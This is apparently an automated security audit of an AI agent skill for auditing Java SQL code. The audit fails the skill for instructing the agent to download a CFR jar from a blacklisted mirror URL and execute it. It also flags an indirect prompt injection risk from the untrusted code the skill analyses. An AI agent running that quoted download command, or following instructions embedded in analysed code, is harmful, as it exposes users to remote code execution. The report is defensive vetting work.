java-sql-audit
Fail
Audited by Gen Agent Trust Hub on May 1, 2026
Risk Level: CRITICALEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONCOMMAND_EXECUTION
Full Analysis
- [EXTERNAL_DOWNLOADS]: The skill provides instructions to download an external tool from an untrusted and blacklisted source.
- Evidence: The file
references/DECOMPILE_STRATEGY.mdcontains the commandcurl -L -o {output_path}/cfr-0.152.jar "https://xget.xi-xu.me/gh/leibnitz27/cfr/releases/download/0.152/cfr-0.152.jar". - Scanner Result: Automated security scanners flagged this URL as malicious (URL:Blacklist).
- [REMOTE_CODE_EXECUTION]: The skill facilitates remote code execution by instructing the agent to run a downloaded binary from an untrusted source.
- Evidence: In
references/DECOMPILE_STRATEGY.md, the commandjava -jar {CFR_JAR} ...is used to execute the downloaded file. - [COMMAND_EXECUTION]: The skill uses various shell commands to perform file system operations and execute programs, including the downloaded malicious binary.
- Evidence: Extensive use of
find,grep,xargs, andjavacommands throughout the skill files. - [INDIRECT_PROMPT_INJECTION]: The skill audits untrusted Java code, creating an attack surface for indirect prompt injection where malicious comments or code could influence agent behavior.
- Ingestion points:
SKILL.mdandreferences/DECOMPILE_STRATEGY.mddescribe auditing user-provided Java source files (.java), class files (.class), and XML configurations. - Boundary markers: Absent; there are no instructions to distinguish between the agent's instructions and the data being analyzed.
- Capability inventory: File system access, shell command execution, and invocation of other analysis tools.
- Sanitization: Absent; the skill does not validate or sanitize the analyzed content before processing it.
Recommendations
- CRITICAL: 1 infected file(s) detected - DO NOT USE
- AI detected serious security threats
- Contains 1 malicious URL(s) - DO NOT USE
Audit Metadata